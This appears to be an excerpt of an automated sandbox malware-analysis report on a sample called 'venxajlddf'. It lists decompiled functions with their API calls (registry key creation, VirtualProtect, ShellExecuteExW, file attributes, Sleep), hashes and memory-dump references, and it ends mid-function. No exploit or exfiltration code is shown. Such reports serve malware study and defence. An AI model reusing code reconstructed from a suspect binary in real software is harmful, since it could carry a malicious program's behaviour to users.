Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: c5c8d79c1340bb369312f6a5c9378fe315f9bf95113b40b2c793821570691f3d
Instruction ID: 25e331afd2345d3cd5f25c8269d0b77429ab830f022e4fbb565c81036e55150a
Opcode Fuzzy Hash: c5c8d79c1340bb369312f6a5c9378fe315f9bf95113b40b2c793821570691f3d
Instruction Fuzzy Hash: 16E09271904104BFDB01EBA5BE499AEB7B8EF44319B10483BF102F00D0DA794D119B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004023B2(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402DA6(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
					_t13 = E00402DA6(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
					_t11 = E00402DA6(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004023b2
0x004023b2
0x004023b4
0x004023b8
0x004023bb
0x004023c0
0x004023c5
0x004023ce
0x004023ce
0x004023d3
0x004023dc
0x004023dc
0x004023e9
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

WritePrivateProfileStringW.KERNEL32 ref: 004023E9

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD

Uniqueness

Uniqueness Score: -1.00%

Function 00406503 Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406503(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406454(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x0040650d
0x00406516
0x0040652c
0x00000000
0x0040652c
0x0040651a
0x00000000

APIs

RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 0040652C

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction ID: 390987c888b9fe28ccc3a202ccefe0e129b8fdbaba7b34d45eb5723cdb444700
Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction Fuzzy Hash: C1E0ECB2010109BEEF099F90EC0ADBB372DEB04704F41492EF907E4091E6B5AE70AA34

Uniqueness

Uniqueness Score: -1.00%

Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401735() {
				long _t5;
				WCHAR* _t8;
				WCHAR* _t11;
				void* _t14;
				long _t17;

				_t5 = SearchPathW(_t8, E00402DA6(0xffffffff), _t8, 0x400, _t11, _t14 + 8); // executed
				_t17 = _t5;
				if(_t17 == 0) {
					 *((intOrPtr*)(_t14 - 4)) = 1;
					 *_t11 = _t8;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t14 - 4));
				return 0;
			}

0x00401749
0x0040174f
0x00401751
0x004028fc
0x00402903
0x00402903
0x00402c2d
0x00402c39

APIs

SearchPathW.KERNELBASE ref: 00401749

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 2c089d9499bcaed07f509e48e4c3e1e82a1ca6aec248580a4a456b36f8037f69
Instruction ID: 6450ab0b933f3cc6d02a21ebc76c27f69b4627690f11a38bac6dda038a0a621d
Opcode Fuzzy Hash: 2c089d9499bcaed07f509e48e4c3e1e82a1ca6aec248580a4a456b36f8037f69
Instruction Fuzzy Hash: 87E08072304105EBE740DB64DE49FAE7368DF40358F204637E511E51D1E6B49945972D

Uniqueness

Uniqueness Score: -1.00%

Function 73BF2A7F Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x73bf5048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x73bf505c, 4, 0x40, 0x73bf504c); // executed
					 *0x73bf505c = 0xc2;
					 *0x73bf504c = 0;
					 *0x73bf5054 = 0;
					 *0x73bf5068 = 0;
					 *0x73bf5058 = 0;
					 *0x73bf5050 = 0;
					 *0x73bf5060 = 0;
					 *0x73bf505e = 0;
				}
				return 1;
			}

0x73bf2a88
0x73bf2a8d
0x73bf2a9d
0x73bf2aa5
0x73bf2aac
0x73bf2ab1
0x73bf2ab6
0x73bf2abb
0x73bf2ac0
0x73bf2ac5
0x73bf2aca
0x73bf2aca
0x73bf2ad2

APIs

VirtualProtect.KERNELBASE(73BF505C,00000004,00000040,73BF504C), ref: 73BF2A9D

Memory Dump Source

Source File: 00000004.00000002.1181655845.0000000073BF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73BF0000, based on PE: true

Associated: 00000004.00000002.1181643941.0000000073BF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181681775.0000000073BF4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181696528.0000000073BF6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73bf0000_venxajlddf.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 96fa7ebaf82b0b6a499fcf472986721056babb13b3a3cdb67712ea50de8cdd00
Instruction ID: 62453ee586a1158b6f7ddfc08128df0f560aed3560229caed98ba7cc128a43b9
Opcode Fuzzy Hash: 96fa7ebaf82b0b6a499fcf472986721056babb13b3a3cdb67712ea50de8cdd00
Instruction Fuzzy Hash: 32F07FF2540282EFC360EB3A8684B093BE0E708204F25752BA19CDBA41E33452488B95

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ecb26fcfbddf9edcaca94c07cf32aba9b51da7ecc0cd49f518a3cca194f28fd5
Instruction ID: 77b6755767f32433cbba579d7de441064f90f02de732d0e129c6c43bd553ff67
Opcode Fuzzy Hash: ecb26fcfbddf9edcaca94c07cf32aba9b51da7ecc0cd49f518a3cca194f28fd5
Instruction Fuzzy Hash: F6D0C772B08100DBDB11DBA8AA08B8D73A0AB00328B208537D001F21D0E6B8C8469A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00404610 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404610(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x429238;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x00404610
0x00404617
0x00404622
0x00000000
0x00404622
0x00404628

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
Instruction ID: 1d0f09303225af8c469e983b8f6ba21d59f3f36861eec243a4bc5be8392dea83
Opcode Fuzzy Hash: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
Instruction Fuzzy Hash: 9EC09B71741700FBDE209B509F45F077794A754701F154979B741F60E0D775D410D62D

Uniqueness

Uniqueness Score: -1.00%

Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403606
0x0040360c

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004045F9 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004045F9(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a268, 0x28, _a4, 1); // executed
				return _t2;
			}

0x00404607
0x0040460d

APIs

SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
Instruction ID: 26063d6d883ff380d2e1d7f9fe2b9d631bf033e6200e0a233fd0d302f8c02db7
Opcode Fuzzy Hash: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
Instruction Fuzzy Hash: 5BB01235286A00FBDE614B00DE09F457E62F764B01F048078F741240F0CAB300B5DF19

Uniqueness

Uniqueness Score: -1.00%

Function 00405C8E Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C8E(struct _SHELLEXECUTEINFOW* _a4) {
				struct _SHELLEXECUTEINFOW* _t4;
				int _t5;

				_t4 = _a4;
				_t4->lpIDList = _t4->lpIDList & 0x00000000;
				_t4->cbSize = 0x3c; // executed
				_t5 = ShellExecuteExW(_t4); // executed
				return _t5;
			}

0x00405c8e
0x00405c93
0x00405c97
0x00405c9d
0x00405ca3

APIs

ShellExecuteExW.SHELL32(?), ref: 00405C9D

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29

Uniqueness

Uniqueness Score: -1.00%

Function 004045E6 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004045E6(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x423744, _a4); // executed
				return _t2;
			}

0x004045f0
0x004045f6

APIs

KiUserCallbackDispatcher.NTDLL(?,004043BD), ref: 004045F0

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
Instruction ID: 97f05af551d2e904d84950d91e3a9b28448307360fbef328a82585e9573e9e03
Opcode Fuzzy Hash: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
Instruction Fuzzy Hash: DBA001B6604500ABDE129F61EF09D0ABB72EBA4B02B418579A28590034CA365961FB1D

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402D84(_t7);
				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d7
0x004014d8
0x004014e1
0x004014e4
0x004014e8
0x004014e8
0x004014ea
0x00402c2d
0x00402c39

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 15a9c0a1a05cffc918dcbcc278dd47063fd183ee82f4bdf0f9578bef0d0e5dce
Instruction ID: bbd52a04332822db077aadb4670005be58b9dadf0e212328a8e92bdd2ddecc01
Opcode Fuzzy Hash: 15a9c0a1a05cffc918dcbcc278dd47063fd183ee82f4bdf0f9578bef0d0e5dce
Instruction Fuzzy Hash: 1BD05E73A141018BD714EBB8BE8545E73A8EB503193208837D442E1191E6788896861C

Uniqueness

Uniqueness Score: -1.00%

Function 73BF12BB Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E73BF12BB() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x73bf506c +  *0x73bf506c); // executed
				return _t3;
			}

0x73bf12c5
0x73bf12cb

APIs

GlobalAlloc.KERNELBASE(00000040,?,73BF12DB,?,73BF137F,00000019,73BF11CA,-000000A0), ref: 73BF12C5

Memory Dump Source

Source File: 00000004.00000002.1181655845.0000000073BF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73BF0000, based on PE: true

Associated: 00000004.00000002.1181643941.0000000073BF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181681775.0000000073BF4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181696528.0000000073BF6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73bf0000_venxajlddf.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 40ee2ba58aebb05443c453a3ea6dcd7edfa101eb37a40e6acd865f24cf713e9d
Instruction ID: 2faa247fadd02aa85957da331c327fa336674438a44931e29f665aac5a02dcdd
Opcode Fuzzy Hash: 40ee2ba58aebb05443c453a3ea6dcd7edfa101eb37a40e6acd865f24cf713e9d
Instruction Fuzzy Hash: A6B012B2A00001FFEE10AB75CE46F343254E700301F145000F608C2980C12049008534

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
